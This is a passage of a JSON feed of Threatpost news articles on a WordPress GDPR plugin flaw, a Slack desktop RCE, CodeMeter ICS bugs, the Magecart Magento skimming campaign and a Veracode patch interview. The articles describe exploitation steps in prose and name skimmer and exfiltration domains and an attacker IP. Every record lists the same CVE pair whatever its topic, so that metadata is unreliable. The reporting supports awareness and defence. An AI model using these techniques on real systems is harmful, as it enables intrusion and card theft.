"https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:24:29", "description": "A popular WordPress plugin, which helps make websites compliant with the General Data Protection Regulation (GDPR), has issued fixes for a critical flaw. If exploited, the vulnerability could enable attackers to modify content or inject malicious JavaScript code into victim websites.\n\nThe plugin, [GDPR Cookie Consent](<https://wordpress.org/plugins/cookie-law-info/>), which helps businesses display cookie banners to show that they are compliant with [EU\u2019s privacy regulation](<https://threatpost.com/ahead-of-gdpr-information-governance-comes-into-its-own/132209/>), has more than 700,000 active installations \u2013 making it a ripe target for attackers. The vulnerability, which does not yet have a CVE number, affects GDPR Cookie Consent version 1.8.2 and below. Earlier this week, after the developer was notified of the critical flaw, the GDPR Cookie Consent plugin was removed from the [WordPress.org](<http://wordpress.org/>) plugin directory \u201cpending a full review\u201d according to the plugin\u2019s directory page. The new version, 1.8.3, was released by Cookie Law Info, the developer behind the plugin, on Feb. 10.\n\n\u201cThere were a number of code changes, but those relevant to security include a capabilities check added to an AJAX endpoint used in the plugin\u2019s administration pages,\u201d according to researchers with [Wordfence this week](<https://www.wordfence.com/blog/2020/02/improper-access-controls-in-gdpr-cookie-consent-plugin/>). While Wordfence disclosed details of the vulnerability, it was discovered by Jerome Bruandet, a security researcher with NinTechNet, who also detailed his findings [in a Wednesday post](<https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability stems from improper access controls in an endpoint used by the WordPress plugin\u2019s AJAX API, a web development technique used to create web applications. That endpoint is the \u201c_construct\u201d method within the plugin, used for initializing code for newly created objects. Once actions are created they are sent via AJAX to the \u201c_construct\u201d method; however, this process fails to implement checks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/13152933/Wordfence-Critical-Bug-Rating.png>)Because of this, the AJAX endpoint, intended to only be accessible to administrators, actually also allowed subscriber-level users to perform a number of actions that can compromise the site\u2019s security, researchers said. A subscriber is a user role in WordPress, usually the with very limited capabilities, including logging into the website and leaving comments.\n\nThe \u201c_construct\u201d method accepts three different values from the AJAX API. Two of them, save_contentdata and autosave_contant_data, can be leveraged for exploitation by an attacker.\n\nThe save_contentdata method is used to allow administrators to save the GDPR cookie notices to the database as a page post type. However, since this method is not checked, an authenticated user or a subscriber can modify any existing page or post (or the entire website), and take them offline by changing their status from \u201cpublished\u201d to \u201cdraft.\u201d\n\n\u201cAdditionally, it is possible to delete or change their content. Injected content can include formatted text, local or remote images as well as hyperlinks and shortcodes,\u201d Bruandet said.\n\nThe other method, autosave_contant_data, is used to save GDPR cookie info page in the background while the admin is editing it, by saving the data into the cli_pg_content_data database field without validating it. However, the lack of checks for this method could allow an authenticated user to inject JavaScript code into the webpage. This code would then be loaded and executed each time someone visits the \u201chttp://example.com/cli-policy-preview/\u201d page.\n\nResearchers who discovered it urge WordPress plugin users to update as soon as possible: \u201cThis vulnerability has been fixed in version 1.8.3. We recommend that users immediately update to the latest version available,\u201d according to Wordfence.\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-13T20:21:09", "type": "threatpost", "title": "Critical WordPress Plugin Bug Afflicts 700K Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-13T20:21:09", "id": "THREATPOST:D002CB7A00429994A6A05F968060A826", "href": "https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T22:16:01", "description": "A critical vulnerability in the popular Slack collaboration app would allow remote code-execution (RCE). Attackers could gain full remote control over the Slack desktop app with a successful exploit \u2014 and thus access to private channels, conversations, passwords, tokens and keys, and various functions. They could also potentially burrow further into an internal network, depending on the Slack configuration, according to a security report.\n\nThe bug (rated between nine and 10 on the CvSS vulnerability-severity scale), was disclosed on Friday, and involves cross-site scripting (XSS) and HTML injection. Slack for Desktop (Mac/Windows/Linux) prior to version 4.4 are vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>) \n\u201cWith any in-app redirect-logic/open redirect, HTML or JavaScript injection, it\u2019s possible to execute arbitrary code within Slack desktop apps,\u201d wrote a bug-hunter going by the handle \u201coskarsv,\u201d who submitted [a report](<https://hackerone.com/reports/783877>) on the bug to Slack via the HackerOne platform (earning $1,500). \u201cThis report demonstrates a specifically crafted exploit consisting of an HTML injection, security control bypass and a RCE JavaScript payload.\u201d\n\nAccording to the disclosed technical writeup, attackers could trigger an exploit by overwriting Slack desktop app \u201cenv\u201d functions to create a tunnel via BrowserWindow; to then execute arbitrary JavaScript, in what is \u201ca weird XSS case,\u201d he said.\n\n## **Technical Details**\n\nTo exploit the bug, attackers would need to upload a file to their own HTTPS-enabled server with a payload; then, they could prepare a Slack post with an HTML injection containing the attack URL pointing to that payload (hidden in an image). After that, they need only to share that post with a public Slack channel or user. If a user clicks on the booby-trapped image, the code will be executed on the victim\u2019s machine.\n\nAs for accomplishing the HTML injection, the issue lies in the way Slack posts are created, according to the researcher.\n\n\u201c[Creating a post] creates a new file on https://files.slack.com with [a specific] JSON structure,\u201d according to the writeup. \u201cIt\u2019s possible to directly edit this JSON structure, which can contain arbitrary HTML.\u201d\n\noskarsv added, \u201cJavaScript execution is restricted by [Content Security Policy](<https://threatpost.com/google-chrome-bug-data-theft/158217/>) (CSP) and various security protections are in place for HTML tags (i.e. banned iframe, applet, meta, script, form etc. and target attribute is overwritten to _blank for A tags). However, it is still possible to inject area and map tags, which can be used to achieve a one-click-RCE.\u201d He further explained that the URL link to the malicious payload could be written within the area tag.\n\nAlternatively, oskarsv also discovered that emails (when sent as plaintext) are stored unfiltered on Slack servers \u2013 a situation that can be abused in order to store the RCE payload without attackers needing to own their own hosting.\n\n\u201cSince it\u2019s a trusted domain, it could contain a phishing page with a fake Slack login page or different arbitrary content which could impact both security and reputation of Slack,\u201d he explained. \u201cThere are no security headers or any restrictions at all as far as I could tell and I\u2019m sure some other security impact could be demonstrated with enough time.\u201d\n\nRegardless of approach, exploits can be used to execute any attacker-provided command, according to the researcher.\n\n\u201cThe payload can be easily modified to access all private conversations, files, tokens etc., without executing commands on the user\u2019s computer,\u201d he wrote, \u201c[or] access to private files, private keys, passwords, secrets, internal network access, etc.\u201d\n\nFurther, the payload could be made \u201cwormable\u201d so that it re-posts to all user workspaces, the researcher added.\n\nUsers should make sure their Slack desktop apps are upgraded to at least version 4.4 in order to avoid attacks. The bug was patched in February, but has just now been disclosed because of a HackerOne disclosure hiatus on all bugs, which was in effect for several months.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Resister today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-08-31T15:36:29", "type": "threatpost", "title": "Critical Slack Bug Allows Access to Private Channels, Conversations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-31T15:36:29", "id": "THREATPOST:694A3BE8CD7B0AD2CFE4B7CB47818F4A", "href": "https://threatpost.com/critical-slack-bug-access-private-channels-conversations/158795/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:13:36", "description": "While patch management already presents challenges for enterprises, it\u2019s even more of a headache for manufacturers and other industrial firms \u2013 who may even need to shut down entire factory operations in order to apply fixes.\n\nSharon Brizinov, the principal vulnerability researcher with Claroty, has discovered and reported various security flaws in industrial control systems (ICS), including most recently a vulnerability in a software component used by various critical infrastructure systems ([which he disclosed last week](<https://threatpost.com/severe-industrial-bugs-takeover-critical-systems/159068/>)).\n\n[**Download the podcast here or listen below.**](<http://traffic.libsyn.com/digitalunderground/Claroty_Podcast.mp3>)\n\nBrizinov told Threatpost that because CodeMeter is a third-party component utilized by various leading ICS products (including Rockwell Automation and Siemens), users may be unaware that it\u2019s running in their environments. The issue is indicative of larger patch-management challenges in the industrial space, where there are difficulties not only for industrial system manufacturers, but for end users themselves, he said.\n\n\u201cWhen we\u2019re talking about ICS, it\u2019s a big more dangerous, and we should be more alert than the usual IT network,\u201d Brizinov said in this week\u2019s Threatpost podcast. \u201cAnd that\u2019s because operational-technology networks, SCADA networks, contain some dangerous parts.\u201d\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/16126142/height/90/theme/custom/thumbnail/yes/direction/backward/render-playlist/no/custom-color/87A93A/%20height=90%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell-Welch**: Welcome back to the Threatpost podcast. This is Lindsey O\u2019Donnell-Welch with Threatpost. And I am joined today by Sharon Brizinov, the principal vulnerability researcher with Claroty, who is going to be talking about some new critical security flaws that were recently discovered in a software component utilized by various industrial systems, as well as industrial control system security in general. So, Sharon, thank you so much for joining us today.\n\n**Sharon Brizinov: **Yeah, thank you. Happy to be here.\n\n**LO:** Great. So just to set the context a little bit here. Last week, researchers [discovered six critical flaws in CodeMeter](<https://threatpost.com/severe-industrial-bugs-takeover-critical-systems/159068/>), which is a software management component that is licensed by several of the top industrial control system software vendors, such as Rockwell Automation, and Siemens. Now, CodeMeter, what it does is it gives these companies the different components and tools to help with their licensing models and to bolster security and protect against reverse engineering and piracy. So Sharon, can you tell us a little bit about these vulnerabilities, and, just to start, how you first discovered them?\n\n**SB:** Yeah, sure. So we actually started the research, I think, one and a half years ago. We started to notice that a lot of products, especially in the ICS domain, are shaped and distributed alongside with a software called CodeMeter. So we were curious why CodeMeter was so common in the ICS domain. And we started to take a look at it. And we discovered, with our research, we discovered six different vulnerabilities that we were able to convert into two different attack scenarios. So we were able to prove that attackers can leverage these six vulnerabilities into the threat vectors that I mentioned. And in one of the attack vectors, attackers can attack the victims using a specifically crafted website. And the second attack vector, attackers can attack the victim by just remotely communicating with the CodeMeter server that is located on the machines.\n\n**LO:** Right. So that sounds like there are varying levels of impact and kind of various levels of severity as well here. Where did the vulnerabilities exist? Were they all in the same area of CodeMeter? Or were they more distributed across the the software component?\n\n**SB:** So actually, they\u2019re distributed. So there are six vulnerabilities. So some of them are in the the protocol communication, part of CodeMeter. Some of them are in the way that code meter is parsing requests from web socket APIs. And some of them are related to license parsing, and license verifications. So it\u2019s very, the places where we found the vulnerabilities are very different from one another.\n\n**LO:** And can you talk a little bit more about the impact of the vulnerabilities and how easy they are to exploit? You had mentioned that, in one case, attackers could potentially send a specially crafted link, and that was one attack vector. What were the different types of attack scenarios there?\n\n**SB: **Yeah, sure. So in the first attack vector that I mentioned, this is actually a very easy one to exploit. In this case, in this attack vector, an attacker will prepare a website somewhere on the internet. And it will prepare, specifically crafted JavaScript that once a victim will go on this website -using some phishing methods or other ways to lure the victim into the website \u2013 the website will send this specifically crafted JavaScript to the browser of the victim. And this JavaScript code, what it will do, it will actually communicate locally with the CodeMeter server and use some web socket API in order to trigger a vulnerability we found in the license mechanism. So the full flow for the first attack vector would be a victim going on a malicious website using some phishing methods, then the website will attack the CodeMeter through the browser, and it will inject a malicious license that will cause CodeMeter to stop working properly.\n\n**LO:** Right. So it sounds like the impact here, too, would be, you know, remote code execution and enabling attackers to launch [denial-of-service attacks](<https://threatpost.com/ddos-attacks-skyrocket-pandemic/159301/>) and some other impacts there as well. It seems like it\u2019s kind of like a broad spectrum, right?\n\n**SB:** Yeah. So this was the first attack vector, and it was very easy to find, because lately, we have seen a rise in web socket usage. And there are a couple of implementation properties that when developers are implementing web socket, they really needed to to notice how they implement the web socket. Otherwise, it could open a door to attackers, just like in this case. So this was the first attack vector, which is kind of easy to exploit.\n\nAnd the second attack vector that we were able to find, requires a little bit of more knowledge of some crypto graphical aspects and crypto graphical methods. In the second attack vector, attackers would need to directly connect and communicate with the CodeMeter server. So they would need to be on the same local area network as their victim. And in this case, they can send specifically crafted packets to the machine, to the CodeMeter server, and then trigger a couple of vulnerabilities that we were able to find.\n\n**LO:** Right, and what would the impact be? If I successfully exploited what could an attacker do in that case scenario?\n\n**SB:** Yeah, so in this case, attackers will be able to run code remotely. So that would be an RCE, [remote code execution](<https://threatpost.com/critical-remote-code-execution-global-power-plants/151087/>), on the remote machine.\n\n**LO:** Right, right. It\u2019s really interesting. I feel like with industrial security, the bar is really raised a bit over other types of security threats, just because of what that could mean for different [industrial control systems](<https://threatpost.com/threatlist-attacks-on-industrial-control-systems-on-the-rise/137251/>), like programmable logic controllers, or other types of controls. And you know, what the real life impact would be for different industrial systems and machines \u2013 can you talk a little bit about what the real life attack or impact would look like for a victim here?\n\n**SB:** Yes, you\u2019re definitely right that when we\u2019re talking about ICS, it\u2019s a big more dangerous, and we should be more alert than the usual IT network. And that\u2019s because OT networks, SCADA networks, contain some dangerous parts. So we have some machines, and we have some actuators in this network. So if an attacker can somehow attack this kind of network, they will be able to get access to [very dangerous equipment that can endanger humans](<https://threatpost.com/triton-malware-targets-industrial-control-systems-in-middle-east/129182/>). And we\u2019ve seen this multiple times in the past. So we have seen it with Stuxnet, [the Stuxnet malware](<https://threatpost.com/details-surface-on-stuxnet-patch-bypass/111579/>) was able to cause some real damage, real physical damage. And that\u2019s why we\u2019re so alert when we\u2019re talking about ICS security. Specifically, in this case, since CodeMeter is so widespread in those networks, because many ICS vendors integrated with CodeMeter, then if attackers will be able to exploit CodeMeter and attack CodeMeter, basically, it means that they will be able to get access to thousands of machines in OT networks. And that\u2019s why it has a such a big impact because it actually opens a door for attackers to attack multiple computers, multiple machines on the ICS network.\n\n**LO:** That could potentially be very damaging and you make a really good point that these challenges do exist, they\u2019re kind of going beyond just CodeMeter and to affected vendors like Rockwell, like Siemens, and Rockwell and Siemens have released their own security advisories, but with CodeMeter being integrated into many ICS products, you know, what can users do to make sure their systems are safe? Because as you had mentioned, in the research users may be unaware that this this vulnerable component is still running in their environment.\n\n**SB:** Yeah, exactly. So you\u2019re definitely right. CodeMeter is a third-party component. So usually users will not install CodeMeter themselves. They will install, let\u2019s say, a software by Rockwell Automation or any software by Siemens, and then along the installation bundle CodeMeter will be shipped and installed. So users will not install coordinator themselves, and therefore they won\u2019t even know they have CodeMeter. And that\u2019s why we developed a website that end users could go online, to our website, to our test web page, and actually test if the machine is vulnerable. So I definitely recommend anyone to go online to our website, to our test page and test if they\u2019re vulnerable. And we have developed a couple of ways to understand if you\u2019re vulnerable too, so we have some tools on our GitHub repository that system administrators could use these tools in their networks to mass scan their network and see what machines are running CodeMeter. So to summarize the answer a bit, first, I would like to recommend anyone to discover instances of CodeMeter in the network so they can do it by going to our test page or our GitHub repository, and download our scanning tool. And then to mitigate it, that\u2019s another story and to mitigate it, first of all, I would recommend to follow Wibu\u2019s own advisory. So Wibu always the company that developed CodeMeter, and they have their own advisory. But also I would recommend end users to read the advisories by the other vendors, let\u2019s say, the Rockwell Automation vendor, or the Siemens, depending on the equipment and software they have installed.\n\n**LO: **Yeah, definitely, for sure. And just taking a step back here and looking at industrial control system security and critical infrastructure security in general, I feel like patching in general in the industrial world is just a big challenge because of different things that need to happen. I mean, machines can\u2019t be just shut down in order to patch and things like that. Can you talk a little bit about what types of challenges there are [when it comes to patch management](<https://threatpost.com/schneider-electric-patches-critical-rce-vulnerability/131610/>) for industrial control systems, and also the process of disclosure in this situation as well, when you first notify them, when a fix was issued?\n\n**SB:** So my team is responsible for finding vulnerabilities. So we assess different tickets, different products from the security, security angle, and we\u2019re trying to find vulnerabilities so the defenders can think ahead. And once we discover a couple of vulnerabilities, we\u2019re preparing a PoC, proof of concept. And then we\u2019re preparing to report and we\u2019re sending it to the vendor. From this point, the vendor needs to triage and make sure our report is valid. And once they do that, we\u2019re starting to work with them in order to fix the vulnerabilities. So sometimes, the vendor asks for us, for more information or to explain a bit how we found it. And once the vendor has a pretty good idea of where their vulnerabilities are and how to patch it, they\u2019re actually developing a patch or they\u2019re developing a new release, and they\u2019re releasing a new version with the fixed code. From this point, we\u2019re starting to work with some CERTs organizations, so CERT organizations [help to distribute the the information that new software releases are out](<https://threatpost.com/nsa-urgent-warning-industrial-cyberattacks-triconex/157723/>) and new patches are out. And we\u2019re working with them too, so they can alert the community, specifically the industrial community, of new vulnerabilities and what are the patches. And from this point, it comes to the first part of your question. And so people know that some vulnerabilities exist, and they needed to patch their software.\n\nAnd so it really depends right now, the type of the factory that or the network that we\u2019re talking about. If we\u2019re talking about an external network that has a some online access to the internet, then patching is much easier. So the admins will just download the patch, and we\u2019ll install it. But if we\u2019re talking about a production network, which is usually offline, it doesn\u2019t connect directly to the internet. So what we\u2019ll have to do is first test the patch offline in their lab. So usually they have a lab offline with all the equipment, which simulates and emulates actually the the real production line and they will test it in the lab to make sure there are no malfunctions and their software works well, with their code that\u2019s running in the factory and the patches. And once they will verify this, they will move on to shut down the factory, maybe it will be on Saturday, maybe it will be on Sunday for a few hours. So patches could be applied when the machines are down. So that\u2019s why it\u2019s so complicated to patch software in production lines, because the administrators will need to work very hard in order to test it in their lab before applying the patches. And then when applying the patches, the factory must be shut down. Because they don\u2019t want any damage to be caused if patches go wrong on a live production.\n\n**LO: **Right? That\u2019s pretty crazy that they have to, you know, completely shut down too. And I think when you look at IT and OT teams, and how they need to work together. One thing that is difficult for people on the security side to realize at least just how important downtime is for [these different types of industrial machines](<https://threatpost.com/ics-security-plagued-with-basic-avoidable-mistakes/138273/>). And I think that is really why patching is such a difficulty. You know, although it\u2019s so necessary as well, as we\u2019re seeing in this case. Now, can you talk a little bit more about what other challenges exist in general, when it comes to applying security controls or other security issues that exist in critical infrastructure that you\u2019ve seen over your time looking for vulnerabilities in industrial control systems?\n\n**SB:** Yeah, sure. So there are a couple of different categories of attackers, some attackers would like to [attack OT networks just to install a ransomware](<https://threatpost.com/ransomware-national-crisis-cisa-ics/153322/>). Because they know that if their ransomware campaign is successful, then the factory is being shut down. And it costs a lot of money to the factory owners, and they most likely pay the ransom. So this is one category of financial cyber criminals that just want to earn some money, and they want to install a ransomware in the network. Another category that we\u2019ve encountered encountered in the past would be attackers, that are nation state sponsored, or a very advanced group that wanted to attack factories to get a foothold inside the OT network, just so they can prepare some kind of weapon, a physical weapon, that they can they can weaponize and use it whenever they need. So for example, they can even blow up a factory if they\u2019re getting enough money from other criminals. So this is a very dangerous type of attacker. And it\u2019s actually very rare to see an ongoing campaign like this, because the the complexity of this campaign, the complexity of this operation is very high. And you need some very advanced tools to maintain such an a campaign. So this is the second category. The third category would be spontaneous access to OT networks. So let\u2019s say you have attackers on the IT network, and suddenly they discover a misconfiguration that allows them to go from the IT network to the OT network, and they just start to poke around and see what kind of computers and what kind of machines and other OT equipment is found on this network. And they\u2019ll just try to use some exploits. Usually it won\u2019t be any sophisticated exploits. So usually it will be one days, not zero days. And usually they could could be couched very quickly because they\u2019re not very sophisticated. So I would categorize the different attackers into these three groups.\n\n**LO: **Right, and I know at least with ransomware, I feel like ransomware attacks have steadily increased over the past year attacking industrial companies, especially [when you look at like Norsk Hydro](<https://threatpost.com/norsk-hydro-calls-ransomware-attack-severe/142924/>) and some of the other vendors who have been targeted. So that seems like it\u2019s an up and coming one. Is that what you\u2019re seeing on your end as well?\n\n**SB: **Yeah, so usually these attacks are opportunistic, so attackers will just release, you know, a phishing campaign or they will release some kind of virus that will try to copy itself to different networks. And if they\u2019re successful, they will be able to infect OT network as well. And then if a malware or in this case ransomware is being spread in the OT network, it will be very beneficial for the attackers, because usually, factory owners will do anything to to continue the production line. So they don\u2019t want to lose money. So they\u2019ll do some analysis, will it cost them more to pay the ransom? Or to shut down their factory?\n\n**LO:** Right, right. And Sharon before we wrap up is there anything else you wanted to highlight either relating to your recent discoveries of the six vulnerabilities in CodeMeter, or just in general, any trends that you may be seeing in the industrial security space?\n\n**SB:** So I just want to sum up with saying that we have seen a high, high and increased usage of malware campaigns and other exploits targeting specifically OT networks. And that\u2019s why we\u2019re very focused on finding vulnerabilities before the attackers will find them. So my message to anyone is always patch. This is the most efficient way to overcome vulnerabilities and be alert.\n\n**LO: **Great. Absolutely. Well, Sharon, thank you so much for joining us today on the Threatpost podcast and talking to us a little bit more about industrial control system security and these recent vulnerabilities.\n\n**SB:** Yeah, sure. Happy to be here. And thank you very much, Lindsey.\n\n**LO:** And to all of our listeners. Thank you for listening in to the Threatpost podcast today. If you have any questions or comments on industrial security, please reach out to us on our Twitter page @Threatpost and catch us on our next episode of the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-09-23T15:32:55", "type": "threatpost", "title": "Critical Industrial Flaws Pose Patching Headache For Manufacturers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-23T15:32:55", "id": "THREATPOST:F7D65957C604C7659052B9B15947A826", "href": "https://threatpost.com/critical-industrial-flaws/159448/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:13:59", "description": "One of the largest known Magecart campaigns to date took place over the weekend, with nearly 2,000 e-commerce sites hacked in an automated campaign that may be linked to a zero-day exploit. The attacks have impacted tens of thousands of customers, who had their credit-card and other information stolen, researchers said.\n\nAccording to Sansec Threat Intelligence, online stores running Magento versions 1 and 2 are being targeted in a classic Magecart attack pattern, where e-commerce sites are hacked, either via a common vulnerability or stolen credentials. If a compromise is successful, merchant websites are then injected with a web skimmer, which surreptitiously exfiltrates personal and banking information entered by customers during the online checkout process.\n\nThe firm\u2019s telemetry picked up \u201c1904 distinct Magento stores with a unique keylogger (skimmer) on the checkout page,\u201d the firm said [in a posting](<https://sansec.io/research/largest-magento-hack-to-date>) on Monday. \u201cOn Friday, 10 stores got infected, then 1058 on Saturday, 603 on Sunday and 233 today\u2026.Most stores were running Magento version 1, which was announced end-of-life last June. However, some stores were running Magento 2.\u201d\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to register.\n\nIn delving into the campaign, Sansec researchers were able to determine that many victimized stores had no prior history of security incidents; and, they speculated that the attacks may be linked to a $5,000 Magento exploit that went up for sale in August in underground forums. The zero-day allows a brand-new avenue to gaining server (write) access to fully patched websites.\n\n\u201cUser z3r0day announced on a hacking forum to sell a Magento 1 remote code-execution exploit method, including instruction video, for $5,000,\u201d according to Sansec, who added that the seller pledged to only sell 10 copies of the exploit.\n\n\u201cAllegedly, no prior Magento admin account is required,\u201d the firm noted. \u201cSeller z3r0day stressed that \u2013 because Magento 1 is end-of-life \u2013 no official patches will be provided by Adobe to fix this bug, which renders this exploit extra-damaging to store owners using the legacy platform.\u201d\n\nAround 95,000 Magento 1 stores are still operating despite the lack of support, the firm added.\n\nSansec\u2019s forensic investigation showed that on Magento 1 stores, a skimmer was injected into the file \u201cprototype.js,\u201d which is part of a standard Magento installation. For the affected Magento 2 stores, a skimmer was found in a jquery.js file, hidden in the Magento 2 code base. In both cases, the same malware is loaded from a malicious mcdnn.net domain, while the data is exfiltrated to a Moscow-hosted site at https://imags.pw/502.jsp, on the same network as the mcdnn.net domain.\n\n\u201cAttacker(s) used the U.S.-based IP 92.242.62.210 to interact with the Magento admin panel, and used the \u2018Magento Connect\u2019 feature to download and install various files, including a malware called mysql.php. This file was automatically deleted after the malicious code was added to prototype.js.\u201d\n\nThe web server logs indicate that numerous attempts were made to install files over the weekend, possibly to install improved versions of the skimmer.\n\n\u201cThis automated campaign is by far the largest one that Sansec has identified since it started monitoring in 2015,\u201d researchers said. \u201cThe previous record was 962 hacked stores in a single day in July last year. The massive scope of this weekend\u2019s incident illustrates increased sophistication and profitability of web skimming. Criminals have been increasingly automating their hacking operations to run web skimming schemes on as many stores as possible.\u201d\n\nResearchers recently reported that they have seen[ an uptick in the number of e-commerce sites ](<https://threatpost.com/8-city-gov-websites-magecart/156954/>)that are being attacked by Magecart and related groups, dovetailing with new tactics. Earlier in September, Magecart was seen [using the secure messaging service Telegram](<https://threatpost.com/magecart-credit-card-skimmer-telegram-c2-channel/158851/>) as a data-exfiltration mechanism.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n\n** **\n", "cvss3": {}, "published": "2020-09-14T16:01:15", "type": "threatpost", "title": "Magecart Attack Impacts More Than 10K Online Shoppers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-14T16:01:15", "id": "THREATPOST:D1DDBC944E33F3C1BB8815964C2B9E2B", "href": "https://threatpost.com/magecart-campaign-10k-online-shoppers/159216/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:23:15", "description": "Companies are lagging when it comes to keeping up with software security patches \u2013 causing them to fall into \u201csecurity debt,\u201d Chris Eng, chief research officer with Veracode said.\n\nToday, challenges around patch management are being worsened by applications using third-party code and open source libraries, which often introduce another entire set of vulnerabilities, said Eng, speaking at the [RSA Conference 2020 in San Francisco](<https://threatpost.com/category/rsac/>) last week.\n\n\u201cWhat will happen is companies will get further and further behind on those on those open source version patches,\u201d he said. \u201cAnd the further you get behind, the harder it is to catch up.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe upside, however, is that researchers are finding that DevOps and security can actually coexist very nicely, creating opportunities to vastly improve software security. \u201cIf you incorporate security in the right way, DevOps is actually a great opportunity to improve the way that you\u2019re doing software security. And so I think that\u2019s the big\u2026 takeaway,\u201d said Eng.\n\nEng discusses the biggest patch management challenges in his full interview with Threatpost, below.\n\n_Below find a lightly edited transcript of the interview. _\n\n**Lindsey O\u2019Donnell Welch**: This is Lindsey O\u2019Donnell Welch with Threatpost, and I\u2019m here today at RSA Conference, joined by Chris Eng with Veracode. Chris, thanks so much for joining us today. How\u2019s your conference been?\n\n**Chris Eng: **It\u2019s been very busy, as usual.\n\n**LO:** It\u2019s always a little crazy, definitely. So, thank you so much for joining us today, I wanted to talk to you about a report that you had released back in October. And it was called the \u201cState of Software Security.\u201d And basically, it was breaking down some of the most prevalent vulnerabilities that were discovered in software, but then also looking at how those vulnerabilities were being addressed and patched and some of the challenges around patch management for companies. Just to start, there is a term that you had used in the report called \u201csecurity debt\u201d \u2013 can you tell us what that term means and how it relates to this report.\n\n**CE:** Yeah, I\u2019ll give you that and kind of a little bit of kind of context for the report. So security debt is kind of if you think about it, anything that you know about in your software, vulnerability wise, that you just select not to fix, that you\u2019re going to fix later. Right? You can think of it like, like financial debt, like racking up, you know, dollars on a credit card, and then paying the minimum each month, right? You\u2019ll eventually get to paying all that down over time, but you\u2019ll pay a lot of interest, it\u2019ll will cost you more, it\u2019ll be more painful. And so we see the same thing with with security debt across the applications that we scan. The report is basically a consolidation of all of the customer scams that happen in our product, so tens of thousands of applications and millions of scans over a one year period. So we can kind of see exactly what\u2019s happening out there, across different industries and so on and what patterns are actually happening.\n\n**LO:** Yeah, that\u2019s really useful information to have obviously. So what are some of the key factors that go into security debt that you guys were specifically looking at?\n\n**CE:** Well, the picture is not the greatest in terms of what we\u2019re seeing out there, we\u2019re seeing over half of applications are actually accumulating more security debt over time. About 25 percent are staying flat, and then 25 percent are actually reducing them. And obviously, that\u2019s what you want, you want to reduce it so that you get to a point where you\u2019ve eliminated all the debt, and then as you go along, you\u2019re detecting new vulnerabilities along the way, but you\u2019re fixing them as they come up, right? Just, again, with the financial analogies, paying down what you spend each month. And a lot of companies are struggling with the security debt for these applications that they may have been building for many years, and just kind of pushing the security vulnerabilities off to the side. So what we really wanted to figure out was, what are the factors that that contribute to how well an organization gets after the security debt. So we looked at a number of different areas there to try and like, find some correlations.\n\n**LO:** Yeah. 